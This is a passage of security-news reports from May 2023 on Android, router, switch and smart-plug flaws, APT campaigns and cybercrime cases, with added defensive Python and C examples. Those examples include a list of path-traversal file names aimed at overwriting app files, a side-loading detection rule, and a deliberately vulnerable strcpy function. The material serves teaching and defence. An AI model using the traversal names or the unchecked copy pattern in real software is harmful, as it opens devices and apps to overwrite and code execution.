"The concept is similar to a file upload vulnerability of a web application," Valsamaras said. "More specifically, a malicious app uses a specially crafted content provider to bear a payload that it sends to the target application."

"As the sender controls the content but also the name of the stream, the receiver may overwrite critical files with malicious content in case it doesn't perform some necessary security checks. Additionally, when certain conditions apply, the receiver may also be forced to copy protected files to a public directory, setting the user's private data at risk."

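The receiver-side fix for the Dirty Stream pattern is a file-name check, and the one below is an added Python model written for this page, not Microsoft's code. A real Android share target is Java or Kotlin, obtains the name by querying the sending provider for OpenableColumns.DISPLAY_NAME, and would canonicalize with File.getCanonicalPath to defeat symlinks as well; the string-level logic is the same. The app directory and the hostile display names are constructed for the demonstration.

```python
import posixpath

# Hypothetical app-private directory of the receiving app; on device this would
# come from Context.getCacheDir() or getFilesDir().
APP_CACHE = "/data/data/com.example.target/cache"

def naive_destination(base_dir: str, display_name: str) -> str:
    """The pattern Dirty Stream abuses: the receiver takes the DISPLAY_NAME the
    sending app's content provider reported and joins it onto its own
    directory without validation. '..' and absolute names escape base_dir."""
    return posixpath.normpath(posixpath.join(base_dir, display_name))

def safe_destination(base_dir: str, display_name: str) -> str:
    """Hardened version. Treat the name as hostile: require a single plain path
    component and confirm the result still lives under base_dir."""
    if not display_name or "\x00" in display_name:
        raise ValueError("empty name or embedded NUL")
    if "/" in display_name or "\\" in display_name:
        raise ValueError("directory separators are not allowed in a file name")
    if display_name in (".", ".."):
        raise ValueError("traversal component")
    base = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(base, display_name))
    # containment check: defence in depth in case the rules above are loosened
    if candidate == base or posixpath.commonpath([base, candidate]) != base:
        raise ValueError("resolved path escapes the destination directory")
    return candidate

def is_accepted(base_dir: str, display_name: str) -> bool:
    """True when safe_destination() would write the stream under base_dir."""
    try:
        safe_destination(base_dir, display_name)
        return True
    except ValueError:
        return False

# Constructed attacker-controlled names, as a hostile provider might report them.
HOSTILE_NAMES = [
    "../shared_prefs/com.example.target_preferences.xml",  # overwrite app settings
    "../../../sdcard/Download/exfil.txt",                   # write to public storage
    "/data/data/com.example.target/lib/libnative.so",       # replace a native library
    "report.pdf",                                           # the only legitimate one
]

if __name__ == "__main__":
    for name in HOSTILE_NAMES:
        print(f"{name!r}: naive -> {naive_destination(APP_CACHE, name)}, "
              f"accepted -> {is_accepted(APP_CACHE, name)}")
```

Rejecting separators outright, rather than trying to strip or normalize them, is deliberate: the display name is only ever meant to be a leaf file name, so anything else is an attack or a bug and should fail closed.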

Escalating China-Taiwan Tensions Fuel Alarming Surge in Cyber Attacks
19.5.23  BigBrothers  The Hacker News
The rising geopolitical tensions between China and Taiwan in recent months have sparked a noticeable uptick in cyber attacks on the East Asian island country.

"From malicious emails and URLs to malware, the strain between China's claim of Taiwan as part of its territory and Taiwan's maintained independence has evolved into a worrying surge in attacks," the Trellix Advanced Research Center said in a new report.

The attacks, which have targeted a variety of sectors in the region, are mainly designed to deliver malware and steal sensitive information, the cybersecurity firm said, adding it detected a four-fold jump in the volume of malicious emails between April 7 and April 10, 2023.

Some of the most impacted industry verticals during the four-day time period were networking, manufacturing, and logistics.

What's more, the spike in malicious emails targeting Taiwan was followed by a 15x increase in PlugX detections between April 10 and April 12, 2023, indicating that the phishing lures acted as an initial access vector to drop additional payloads.

PlugX, a remote access trojan spotted in the wild since 2008, is a Windows backdoor that has been put to use by numerous Chinese threat actors to control victim machines. It's also known for employing DLL side-loading techniques to fly under the radar.

"This technique consists of a legitimate program loading a malicious dynamic link library (DLL) file that masquerades as a legitimate DLL file," Trellix researchers Daksh Kapur and Leandro Velasco said.

"This allows the execution of arbitrary malicious code bypassing security measures that look for malicious code running directly from an executable file."

Besides PlugX, Trellix said it also identified other malware families such as the Kryptik trojan as well as stealers like Zmutzy and FormBook targeting the nation.
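The side-loading pattern described above is visible in image-load telemetry: a signed, legitimate executable running from a user-writable directory loads an unsigned DLL from that same directory, usually one named after a real Windows DLL. The following is an added detection example written for this page, not Trellix's logic. It runs over constructed records that borrow Sysmon Event ID 7 field names (Image, ImageLoaded, Signed); the trusted-directory prefixes and the list of commonly shadowed DLL names are assumptions to be tuned from your own telemetry.

```python
from pathlib import PureWindowsPath

# Directories where a DLL is expected to live; loads from anywhere else get
# extra scrutiny. Assumed list; extend it for your estate.
TRUSTED_DIR_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Legitimate Windows DLL names that side-loading payloads are commonly named
# after. Assumed list for the example; build yours from observed loads.
COMMONLY_SHADOWED = {"version.dll", "dwmapi.dll", "wtsapi32.dll",
                     "msimg32.dll", "cryptbase.dll", "winmm.dll"}

def _parent(path: str) -> str:
    return str(PureWindowsPath(path).parent).lower()

def _name(path: str) -> str:
    return PureWindowsPath(path).name.lower()

def sideload_findings(event: dict) -> list[str]:
    """Return the reasons an image-load event looks like DLL side-loading.

    `event` uses Sysmon Event ID 7 field names: Image is the loading process,
    ImageLoaded the DLL, Signed is 'true' or 'false'. An empty list means the
    rule considers the load benign."""
    reasons = []
    dll, exe = event["ImageLoaded"], event["Image"]
    dll_dir = _parent(dll)
    unsigned = event.get("Signed", "false").lower() != "true"
    in_trusted_dir = dll_dir.startswith(TRUSTED_DIR_PREFIXES)
    if unsigned and dll_dir == _parent(exe) and not in_trusted_dir:
        reasons.append("unsigned DLL loaded from the executable's own directory "
                       "outside a trusted location")
    if _name(dll) in COMMONLY_SHADOWED and not in_trusted_dir:
        reasons.append(f"{_name(dll)} is a Windows DLL name but was loaded from {dll_dir}")
    return reasons

def hunt(events):
    """Run the rule over a batch of events and keep only the hits."""
    return [(e["Image"], e["ImageLoaded"], r) for e in events if (r := sideload_findings(e))]

# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ImageLoaded": r"C:\Windows\System32\version.dll", "Signed": "true"},
    {"Image": r"C:\Users\alice\AppData\Local\Temp\AdobeUpdate\AcroRd32.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\AdobeUpdate\version.dll", "Signed": "false"},
    {"Image": r"C:\Program Files\Vendor\tool.exe",
     "ImageLoaded": r"C:\Program Files\Vendor\helper.dll", "Signed": "false"},
    {"Image": r"C:\Users\alice\Downloads\invoice\oleview.exe",
     "ImageLoaded": r"C:\Users\alice\Downloads\invoice\aclui.dll", "Signed": "false"},
]

if __name__ == "__main__":
    for exe, dll, reasons in hunt(SAMPLE_EVENTS):
        print(exe, "->", dll)
        for reason in reasons:
            print("   ", reason)
```

The third sample (an unsigned helper under Program Files) is deliberately left alone: many legitimate applications ship unsigned helper DLLs, and the signal that matters for PlugX-style tradecraft is the combination of a user-writable location, a same-directory load, and a system DLL name. Add the executable's own signer as a fourth field if your telemetry carries it, since a signed vendor binary dropped into a Temp folder is the strongest single indicator.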

That's not all. Some of the socially engineered messages contained links to seemingly innocuous login pages that mimic legitimate brands, including DHL, in an attempt to trick users into entering their credentials.

"In the past few years, we noticed that geopolitical conflicts are one of the main drivers for cyber attacks on a variety of industries and institutions," Joseph Tal, senior vice president of the Trellix Advanced Research Center, said.

"Monitoring geopolitical events can help organizations to predict cyber attacks in countries they operate in."


8220 Gang Exploiting Oracle WebLogic Flaw to Hijack Servers and Mine Cryptocurrency
18.5.23  Exploit  The Hacker News
The notorious cryptojacking group tracked as 8220 Gang has been spotted weaponizing a six-year-old security flaw in Oracle WebLogic servers to ensnare vulnerable instances into a botnet and distribute cryptocurrency mining malware.

The flaw in question is CVE-2017-3506 (CVSS score: 7.4), which, when successfully exploited, could allow an unauthenticated attacker to execute arbitrary commands remotely.

"This allows attackers to gain unauthorized access to sensitive data or compromise the entire system," Trend Micro researcher Sunil Bharti said in a report published this week.

8220 Gang, first documented by Cisco Talos in late 2018, is so named for its original use of port 8220 for command-and-control (C2) network communications.

"8220 Gang identifies targets via scanning for misconfigured or vulnerable hosts on the public internet," SentinelOne noted last year. "8220 Gang is known to make use of SSH brute force attacks post-infection for the purposes of lateral movement inside a compromised network."

Earlier this year, Sysdig detailed attacks mounted by the "low-skill" crimeware group between November 2022 and January 2023 that aimed to breach vulnerable Oracle WebLogic and Apache web servers and deploy a cryptocurrency miner.

It has also been observed making use of an off-the-shelf malware downloader known as PureCrypter as well as a crypter codenamed ScrubCrypt to conceal the miner payload and evade detection by security software.

In the latest attack chain documented by Trend Micro, the Oracle WebLogic Server vulnerability is leveraged to deliver a PowerShell payload, which is then used to create another obfuscated PowerShell script in memory.

This newly created PowerShell script disables Windows Antimalware Scan Interface (AMSI) detection and launches a Windows binary that subsequently reaches out to a remote server to retrieve a "meticulously obfuscated" payload.

The intermediate DLL file, for its part, is configured to download a cryptocurrency miner from one of the three C2 servers – 179.43.155[.]202, work.letmaker[.]top, and su-94.letmaker[.]top – using TCP ports 9090, 9091, or 9092.

Trend Micro said recent attacks have also entailed the misuse of a legitimate Linux tool called lwp-download to save arbitrary files on the compromised host.

"lwp-download is a Linux utility present in a number of platforms by default, and 8220 Gang making this a part of any malware routine can affect a number of services even if it were reused more than once," Bharti said.

"Considering the threat actor's tendency to reuse tools for different campaigns and abuse legitimate tools as part of the arsenal, organizations' security teams might be challenged to find other detection and blocking solutions to fend off attacks that abuse this utility."


Darknet Carding Kingpin Pleads Guilty: Sold Financial Info of Tens of Thousands
18.5.23  CyberCrime  The Hacker News
A U.S. national has pleaded guilty in a Missouri court to operating a darknet carding site and selling financial information belonging to tens of thousands of victims in the country.

Michael D. Mihalo, aka Dale Michael Mihalo Jr. and ggmccloud1, has been accused of setting up a carding site called Skynet Market that specialized in the trafficking of credit and debit card data.

Mihalo and his associates also peddled their warez on other dark web marketplaces such as AlphaBay Market, Wall Street Market, and Hansa Market between February 22, 2016, and October 1, 2019.

"Mihalo assembled and directed the team that helped him sell this stolen financial information on the darknet," the U.S. Department of Justice (DoJ) said in a press statement released on May 16, 2023.

"Mihalo personally possessed, sent, and received the information associated with 49,084 stolen payment cards with the intent that the payment card information would be trafficked on darknet sites, all in furtherance of the conspiracy."

One of the defendant's accomplices, Taylor Ross Staats, worked as a "card checker," ensuring that the financial information being sold was still valid and had not been canceled by the respective financial institutions.

Staats is estimated to have earned at least $21,000 worth of Bitcoin for these services. He pleaded guilty on December 14, 2022, to one count of conspiracy to commit access device fraud for his role in the operation. He faces a maximum penalty of five years in prison.

Mihalo, a 40-year-old Illinois native, raked in more than $1 million worth of cryptocurrencies from the schemes, the Justice Department added.

The defendant has pleaded guilty to one count of conspiracy to commit access device fraud, which carries a maximum prison term of five years, as well as one count of access device fraud and six counts of money laundering, each of which carries up to 10 years of jail time. He has also been ordered to forfeit all the illicit proceeds.

Earlier this month, U.S. authorities also shut down Try2Check, a popular Russian platform that was used by cybercriminals to confirm the legitimacy of stolen credit card information.


Apple Thwarts $2 Billion in App Store Fraud, Rejects 1.7 Million App Submissions
18.5.23  Apple  The Hacker News
Apple has announced that it prevented over $2 billion in potentially fraudulent transactions and rejected roughly 1.7 million app submissions for privacy and security violations in 2022.

The computing giant said it terminated 428,000 developer accounts for potentially fraudulent activity, blocked 105,000 fake developer account creations, and deactivated 282 million bogus customer accounts. It further noted that it thwarted 198 million attempted fraudulent new accounts prior to their creation.

In contrast, Apple is estimated to have booted out 802,000 developer accounts in 2021. The company attributed the decline to new App Store "methods and protocols" that prevent the creation of such accounts in the first place.

"In 2022, Apple protected users from nearly 57,000 untrustworthy apps from illegitimate storefronts," the company emphasized. "These unauthorized marketplaces distribute harmful software that can imitate popular apps or alter them without the consent of their developers."

It also touted its App Review process as having been able to flag apps using malicious code designed to steal users' credentials from third-party services as well as those that impersonated legitimate financial management platforms. A total of 6.1 million app submissions were reviewed.

"Over 153,000 app submissions rejected from the App Store last year were found to be spam, copycats, or misleading, and nearly 29,000 submissions were rejected for containing hidden or undocumented features," Apple said. "Upward of 400,000 app submissions were rejected for privacy violations."

On a related note, more than 147 million fraudulent ratings and reviews in the App Store were detected and blocked in 2022, with Apple intercepting close to 3.9 million attempts to install or launch apps distributed illicitly through its Developer Enterprise Program over the past 30 days alone.

Last but not least, Cupertino highlighted that it also blocked nearly 3.9 million stolen credit cards from being used to make fraudulent purchases, and banned 714,000 accounts from transacting again. In all, $2.09 billion in fraudulent transactions on the App Store were blocked in 2022.

The numbers come amid speculation that Apple may soon enable sideloading and allow third-party app stores on iOS devices to comply with the European Union's Digital Markets Act (DMA), which went into effect on November 1, 2022.

The disclosure also arrives close on the heels of a similar report from Google, which said it dismantled 173,000 bad accounts and blocked 1.43 million harmful apps from being published to the Play Store in 2022. It also fended off more than $2 billion in fraudulent and abusive transactions.

Despite these ongoing efforts by Apple and Google, threat actors have found a variety of ways to bypass security protections and publish their apps on the official app stores, often submitting innocuous apps to get past the vetting process and subsequently updating them with malicious functionality.

Earlier this February, app development company Mysk uncovered sketchy two-factor authentication (2FA) apps – one of them ranking at number five for "authenticator app" in the US App Store – that trick users into subscribing to a weekly or annual plan. Similar scam apps were reported in 2022.

"As bad actors evolve their dishonest tactics and methods of deception, Apple supplements its anti-fraud initiatives with feedback gleaned from a myriad of channels — from news stories to social media to AppleCare calls — and will continue to develop new approaches and tools designed to prevent fraud from harming App Store users and developers," the company said.


Critical Flaws in Cisco Small Business Switches Could Allow Remote Attacks
18.5.23  Vulnerability  The Hacker News
Cisco has released updates to address a set of nine security flaws in its Small Business Series Switches that could be exploited by an unauthenticated, remote attacker to run arbitrary code or cause a denial-of-service (DoS) condition.

"These vulnerabilities are due to improper validation of requests that are sent to the web interface," Cisco said, crediting an unnamed external researcher for reporting the issues.

Four of the nine vulnerabilities are rated 9.8 out of 10 on the CVSS scoring system, making them critical in nature. The nine flaws affect the following product lines -

250 Series Smart Switches (Fixed in firmware version 2.5.9.16)
350 Series Managed Switches (Fixed in firmware version 2.5.9.16)
350X Series Stackable Managed Switches (Fixed in firmware version 2.5.9.16)
550X Series Stackable Managed Switches (Fixed in firmware version 2.5.9.16)
Business 250 Series Smart Switches (Fixed in firmware version 3.3.0.16)
Business 350 Series Managed Switches (Fixed in firmware version 3.3.0.16)
Small Business 200 Series Smart Switches (Will not be patched)
Small Business 300 Series Managed Switches (Will not be patched)
Small Business 500 Series Stackable Managed Switches (Will not be patched)
A brief description of each of the flaws is as follows -

CVE-2023-20159 (CVSS score: 9.8): Cisco Small Business Series Switches Stack Buffer Overflow Vulnerability
CVE-2023-20160 (CVSS score: 9.8): Cisco Small Business Series Switches Unauthenticated BSS Buffer Overflow Vulnerability
CVE-2023-20161 (CVSS score: 9.8): Cisco Small Business Series Switches Unauthenticated Stack Buffer Overflow Vulnerability
CVE-2023-20189 (CVSS score: 9.8): Cisco Small Business Series Switches Unauthenticated Stack Buffer Overflow Vulnerability
CVE-2023-20024 (CVSS score: 8.6): Cisco Small Business Series Switches Unauthenticated Heap Buffer Overflow Vulnerability
CVE-2023-20156 (CVSS score: 8.6): Cisco Small Business Series Switches Unauthenticated Heap Buffer Overflow Vulnerability
CVE-2023-20157 (CVSS score: 8.6): Cisco Small Business Series Switches Unauthenticated Heap Buffer Overflow Vulnerability
CVE-2023-20158 (CVSS score: 8.6): Cisco Small Business Series Switches Unauthenticated Denial-of-Service Vulnerability
CVE-2023-20162 (CVSS score: 7.5): Cisco Small Business Series Switches Unauthenticated Configuration Reading Vulnerability
Successful exploitation of the aforementioned bugs could permit an unauthenticated, remote attacker to execute arbitrary code with root privileges on an affected device by sending a specially crafted request through the web-based user interface.

Alternatively, they could also be abused to trigger a DoS condition or read unauthorized information on vulnerable systems by means of a malicious request.

Cisco said it does not plan to release firmware updates for Small Business 200 Series Smart Switches, Small Business 300 Series Managed Switches, and Small Business 500 Series Stackable Managed Switches, as they have entered the end-of-life process.

The networking equipment major also said it's aware of the availability of proof-of-concept (PoC) exploit code, but noted that it did not observe any evidence of malicious exploitation in the wild.

With Cisco devices becoming a lucrative attack vector for threat actors, users are recommended to move quickly to apply the patches to mitigate potential threats.


OilAlpha: Emerging Houthi-linked Cyber Threat Targets Arabian Android Users
18.5.23  Android  The Hacker News
A hacking group dubbed OilAlpha with suspected ties to Yemen's Houthi movement has been linked to a cyber espionage campaign targeting development, humanitarian, media, and non-governmental organizations in the Arabian peninsula.

"OilAlpha used encrypted chat messengers like WhatsApp to launch social engineering attacks against its targets," cybersecurity company Recorded Future said in a technical report published Tuesday.

"It has also used URL link shorteners. Per victimology assessment, it appears a majority of the targeted entities were Arabic-language speakers and operated Android devices."

OilAlpha is the new cryptonym given by Recorded Future to two overlapping clusters previously tracked by the company under the names TAG-41 and TAG-62 since April 2022. TAG-XX (short for Threat Activity Group) is the temporary moniker assigned to emerging threat groups.

The assessment that the adversary is acting in the interest of the Houthi movement is based on the fact that the infrastructure used in the attacks is almost exclusively associated with Public Telecommunication Corporation (PTC), a Yemeni telecom service provider under Houthi control.

That said, the persistent use of PTC assets doesn't rule out the possibility of a compromise by an unknown third party. Recorded Future, however, noted that it did not find any evidence to back up this line of reasoning.

Another factor is the use of malicious Android-based applications to likely surveil delegates associated with Saudi Arabian government-led negotiations. These apps mimicked entities tied to the Saudi Arabian government and a humanitarian organization in the U.A.E.

The attack chains commence with potential targets – political representatives, media personalities, and journalists – receiving the APK files directly from WhatsApp accounts using Saudi Arabian telephone numbers by masquerading the apps as belonging to UNICEF, NGOs, and other relief organizations.

The apps, for their part, act as a conduit to drop a remote access trojan called SpyNote (aka SpyMax) that comes with a plethora of features to capture sensitive information from infected devices.

"OilAlpha's focus in targeting Android devices is not surprising due to the high saturation of Android devices in the Arabian Peninsula region," Recorded Future said.

The cybersecurity company said it also observed njRAT (aka Bladabindi) samples communicating with command-and-control (C2) servers associated with the group, indicating that it's simultaneously making use of desktop malware in its operations.

"OilAlpha launched its attacks at the behest of a sponsoring entity, namely Yemen's Houthis," it theorized. "OilAlpha could be directly affiliated to its sponsoring entity, or could also be operating like a contracting party."

"While OilAlpha's activity is pro-Houthi, there is insufficient evidence to suggest that Yemeni operatives are responsible for this threat activity. External threat actors like Lebanese or Iraqi Hezbollah, or even Iranian operators supporting the IRGC, may have led this threat activity."


Threat Group UNC3944 Abusing Azure Serial Console for Total VM Takeover
17.5.23  CyberCrime  The Hacker News
A financially motivated cyber actor has been observed abusing Microsoft Azure Serial Console on virtual machines (VMs) to install third-party remote management tools within compromised environments.

Google-owned Mandiant attributed the activity to a threat group it tracks under the name UNC3944, which is also known as Roasted 0ktapus and Scattered Spider.

"This method of attack was unique in that it avoided many of the traditional detection methods employed within Azure and provided the attacker with full administrative access to the VM," the threat intelligence firm said.

The emerging adversary, which first came to light late last year, is known to have leveraged SIM swapping attacks to breach telecommunications and business process outsourcing (BPO) companies since at least May 2022.

Subsequently, Mandiant also found UNC3944 utilizing a loader named STONESTOP to install a malicious signed driver dubbed POORTRY that's designed to terminate processes associated with security software and delete files as part of a BYOVD attack.

It's currently not known how the threat actor conducts the SIM swaps, although the initial access methodology is suspected to involve SMS phishing messages targeting privileged users to obtain their credentials, followed by a SIM swap so that the two-factor authentication (2FA) token is delivered to a SIM card under the attacker's control.

Armed with the elevated access, the threat actor then moves to survey the target network by exploiting Azure VM extensions such as Azure Network Watcher, Azure Windows Guest Agent, VMSnapshot, and Azure Policy guest configuration.

"Once the attacker completes their reconnaissance, they employ the serial console functionality in order to gain an administrative command prompt inside of an Azure VM," Mandiant said, adding it observed UNC3944 making use of PowerShell to deploy legitimate remote administration tools.

The development is yet more evidence of attackers taking advantage of living-off-the-land (LotL) techniques to sustain and advance an attack, while simultaneously circumventing detection.

"The novel use of the serial console by attackers is a reminder that these attacks are no longer limited to the operating system layer," Mandiant said.

"Unfortunately, cloud resources are often poorly misunderstood, leading to misconfigurations that can leave these assets vulnerable to attackers. While methods of initial access, lateral movement, and persistence vary from one attacker to another, one thing is clear: Attackers have their eyes on the cloud."


Serious Unpatched Vulnerability Uncovered in Popular Belkin Wemo Smart Plugs
17.5.23  Vulnerability  The Hacker News
The second generation version of Belkin's Wemo Mini Smart Plug has been found to contain a buffer overflow vulnerability that could be weaponized by a threat actor to inject arbitrary commands remotely.

The issue, assigned the identifier CVE-2023-27217, was discovered and reported to Belkin on January 9, 2023, by Israeli IoT security company Sternum, which reverse-engineered the device and gained firmware access.

Wemo Mini Smart Plug V2 (F7C063) offers convenient remote control, allowing users to turn electronic devices on or off using a companion app installed on a smartphone or tablet.

The heart of the problem lies in a feature that lets users rename the smart plug by setting a "FriendlyName." The default name assigned is "Wemo mini 6E9."

"The name length is limited to 30 characters or less, but this rule is only enforced by the app itself," security researchers Amit Serper and Reuven Yakar said in a report shared with The Hacker News, adding the validation was not applied by the firmware code.

As a result, circumventing the character limit with a Python module named pyWeMo can trigger a buffer overflow condition, which can then be reliably exploited to crash the device or, alternatively, trick the code into running malicious commands and take control of it.
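The validation gap described above, as an added example that is not Belkin's firmware code: a constructed device-side name setter in C that trusts the app's 30-character limit, beside one that enforces the limit on the device itself. The buffer size, function names and the use of the article's default name are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Constructed illustration, not Belkin firmware. The companion app
 * enforces a 30-character limit on FriendlyName; the question is whether
 * the device enforces it too. */
#define FRIENDLY_NAME_MAX 30
#define FRIENDLY_NAME_BUF (FRIENDLY_NAME_MAX + 1)   /* room for the NUL */

/* Device-side storage for the name (default taken from the article). */
static char g_friendly_name[FRIENDLY_NAME_BUF] = "Wemo mini 6E9";

/* Length of s, scanning at most max bytes (so an unterminated or
 * overlong input can never run the scan past the limit). */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

/* Vulnerable pattern: relies on the app having checked the length.
 * Any client that talks to the device directly (or via the cloud API)
 * can send a longer string, and strcpy() writes past g_friendly_name. */
void set_friendly_name_unchecked(const char *name)
{
    strcpy(g_friendly_name, name);
}

/* Hardened pattern: the device validates the length itself before
 * copying, so it does not matter what the client enforced.
 * Returns 0 on success, -1 if the name is empty or longer than 30. */
int set_friendly_name_checked(const char *name)
{
    size_t n = bounded_len(name, FRIENDLY_NAME_BUF);
    if (n == 0 || n > FRIENDLY_NAME_MAX)
        return -1;                      /* reject; stored name untouched */
    memcpy(g_friendly_name, name, n);
    g_friendly_name[n] = '\0';
    return 0;
}

const char *get_friendly_name(void)
{
    return g_friendly_name;
}

int main(void)
{
    char too_long[64];
    memset(too_long, 'A', 40);          /* 40 chars: over the limit */
    too_long[40] = '\0';

    printf("default: %s\n", get_friendly_name());
    printf("checked(40 chars) -> %d\n", set_friendly_name_checked(too_long));
    printf("checked(\"Kitchen lamp\") -> %d, now: %s\n",
           set_friendly_name_checked("Kitchen lamp"), get_friendly_name());
    /* set_friendly_name_unchecked(too_long) would overflow; not called. */
    return 0;
}
```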

Belkin, in response to the findings, has said that it does not plan to address the flaw owing to the fact that the device is reaching end-of-life (EoL) and has been replaced by newer models.

"It appears that this vulnerability could be triggered via the Cloud interface (meaning, without a direct connection to the device)," the researchers cautioned.

In the absence of a fix, users of Wemo Mini Smart Plug V2 are recommended to avoid exposing them directly to the internet and ensure that appropriate segmentation measures are implemented if they have been deployed in sensitive networks.

"This is what happens when devices are shipped without any on-device protection. If you only rely on responsive security patching, as most device manufacturers do today, two things are certain: you will always be one step behind the attacker, and one day the patches will stop coming," said Igal Zeifman, vice president of marketing for Sternum.


State-Sponsored Sidewinder Hacker Group's Covert Attack Infrastructure Uncovered
17.5.23  BigBrothers  The Hacker News
Cybersecurity researchers have unearthed previously undocumented attack infrastructure used by the prolific state-sponsored group SideWinder to strike entities located in Pakistan and China.

This comprises a network of 55 domains and IP addresses used by the threat actor, cybersecurity companies Group-IB and Bridewell said in a joint report shared with The Hacker News.

"The identified phishing domains mimic various organizations in the news, government, telecommunications, and financial sectors," researchers Nikita Rostovtsev, Joshua Penny, and Yashraj Solanki said.

SideWinder has been known to be active since at least 2012, with attack chains primarily leveraging spear-phishing as an intrusion mechanism to obtain a foothold into targeted environments.

The target range of the group is widely believed to be associated with Indian espionage interests. The most frequently attacked nations include Pakistan, China, Sri Lanka, Afghanistan, Bangladesh, Myanmar, the Philippines, Qatar, and Singapore.

Earlier this February, Group-IB brought to light evidence that SideWinder may have targeted 61 government, military, law enforcement, and other organizations across Asia between June and November 2021.

More recently, the nation-state group was observed leveraging a technique known as server-based polymorphism in evasive attacks targeting Pakistani government organizations.

The newly discovered domains mimic government organizations in Pakistan, China, and India and are characterized by the use of the same values in WHOIS records and similar registration information.

Hosted on some of these domains are government-themed lure documents that are designed to download an unknown next-stage payload.

A majority of these documents were uploaded to VirusTotal in March 2023 from Pakistan. One among them is a Microsoft Word file purportedly from the Pakistan Navy War College (PNWC), which was analyzed by both QiAnXin and BlackBerry in recent months.

Also uncovered is a Windows shortcut (LNK) file that was uploaded to VirusTotal from Beijing in late November 2022. The LNK file, for its part, is engineered to run an HTML application (HTA) file retrieved from a remote server that spoofs Tsinghua University's email system (mailtsinghua.sinacn[.]co).

Another LNK file that was uploaded to VirusTotal around the same time from Kathmandu employs a similar method to fetch an HTA file from a domain masquerading as a Nepalese government website (mailv.mofs-gov[.]org).

Further investigation into SideWinder's infrastructure has led to the discovery of a malicious Android APK file (226617) that was uploaded to VirusTotal from Sri Lanka in March 2023.

The rogue Android app passes off as a "Ludo Game" and prompts users to grant it access to contacts, location, phone logs, SMS messages, and calendar, effectively functioning as spyware capable of harvesting sensitive information.

Group-IB said the app also exhibits similarities with the fake Secure VPN app the company disclosed in June 2022 as being distributed to targets in Pakistan by means of a traffic direction system (TDS) called AntiBot.

In all, the domains point to SideWinder setting its sights on financial, government, and law enforcement organizations, as well as companies specializing in e-commerce and mass media in Pakistan and China.

"Like many other APT groups, SideWinder relies on targeted spear-phishing as the initial vector," the researchers said. "It is therefore important for organizations to deploy business email protection solutions that detonate malicious content."


U.S. Offers $10 Million Bounty for Capture of Notorious Russian Ransomware Operator
17.5.23  Crime  The Hacker News
Russian Ransomware Operator
A Russian national has been charged and indicted by the U.S. Department of Justice (DoJ) for launching ransomware attacks against "thousands of victims" in the country and across the world.

Mikhail Pavlovich Matveev (aka Wazawaka, m1x, Boriselcin, and Uhodiransomwar), the 30-year-old individual in question, is alleged to be a "central figure" in the development and deployment of LockBit, Babuk, and Hive ransomware variants since at least June 2020.

"These victims include law enforcement and other government agencies, hospitals, and schools," DoJ said. "Total ransom demands allegedly made by the members of these three global ransomware campaigns to their victims amount to as much as $400 million, while total victim ransom payments amount to as much as $200 million."

LockBit, Babuk, and Hive operate alike, leveraging unlawfully obtained access to exfiltrate valuable data and deploy ransomware on compromised networks. The threat actors also threaten to publicize the stolen information on a data leak site in an attempt to negotiate a ransom amount with victims.

Matveev has been charged with conspiring to transmit ransom demands, conspiring to damage protected computers, and intentionally damaging protected computers. If convicted, which is unlikely, he faces over 20 years in prison.

The U.S. State Department has also announced an award of up to $10 million for information that leads to the arrest and/or conviction of Matveev.

Separately, the Treasury Department's Office of Foreign Assets Control (OFAC) announced sanctions against the defendant, stating he claimed "his illicit activities will be tolerated by local authorities provided that he remains loyal to Russia."

According to cybersecurity journalist Brian Krebs, one of Matveev's alter egos included Orange, which the defendant used to establish the now-defunct Russian Anonymous Marketplace (aka RAMP) darknet forum.

Despite the flurry of law enforcement actions to crack down on the cybercrime ecosystem in recent years, the ransomware-as-a-service (RaaS) model continues to be a lucrative one, offering affiliates high-profit margins without having to develop and maintain the malware themselves.

The financial mechanics associated with RaaS have also lowered the barrier to entry for aspiring cybercriminals, who can avail themselves of the services offered by the ransomware developers to mount the attacks and pocket the lion's share of the ill-gotten proceeds.

Australian and U.S. authorities release BianLian ransomware alert
The development comes as U.S. and Australian cybersecurity agencies released a joint advisory on BianLian ransomware, a double extortion group that has targeted several critical infrastructure, professional services, and property development sectors since June 2022.

"The group gains access to victim systems through valid Remote Desktop Protocol (RDP) credentials, uses open-source tools and command-line scripting for discovery and credential harvesting, and exfiltrates victim data via File Transfer Protocol (FTP), Rclone, or Mega," according to the advisory.

Czech cybersecurity firm Avast, earlier this year, published a free decryptor for BianLian ransomware to help victims of the malware recover locked files without having to pay the threat actors.

The security bulletin also arrives amid the emergence of a new ransomware strain dubbed LokiLocker that shares similarities with another locker called BlackBit and has been observed actively targeting entities in South Korea.


China's Mustang Panda Hackers Exploit TP-Link Routers for Persistent Attacks
16.5.23  Exploit  The Hacker News
The Chinese nation-state actor known as Mustang Panda has been linked to a new set of sophisticated and targeted attacks aimed at European foreign affairs entities since January 2023.

An analysis of these intrusions, per Check Point researchers Itay Cohen and Radoslaw Madej, has revealed a custom firmware implant designed explicitly for TP-Link routers.

"The implant features several malicious components, including a custom backdoor named 'Horse Shell' that enables the attackers to maintain persistent access, build anonymous infrastructure, and enable lateral movement into compromised networks," the company said.

"Due to its firmware-agnostic design, the implant's components can be integrated into various firmware by different vendors."

The Israeli cybersecurity firm is tracking the threat group under the name Camaro Dragon, which is also known as BASIN, Bronze President, Earth Preta, HoneyMyte, RedDelta, and Red Lich.

The exact method used to deploy the tampered firmware images on the infected routers is currently unknown, as is its usage and involvement in actual attacks. It's suspected that initial access may have been acquired by exploiting known security flaws or brute-forcing devices with default or easily guessable passwords.

What is known is that the C++-based Horse Shell implant provides attackers the ability to execute arbitrary shell commands, upload and download files to and from the router, and relay communication between two different clients.

But in an interesting twist, the router backdoor is believed to target arbitrary devices on residential and home networks, suggesting that the compromised routers are being co-opted into a mesh network with the goal of creating a "chain of nodes between main infections and real command-and-control."

In relaying communications between infected routers by using a SOCKS tunnel, the idea is to introduce an additional layer of anonymity and conceal the final server, as each node in the chain contains information only about the nodes preceding and succeeding it.

Put differently, the methods obscure the origin and destination of the traffic in a manner analogous to TOR, making it a lot more challenging to detect the scope of the attack and disrupt it.

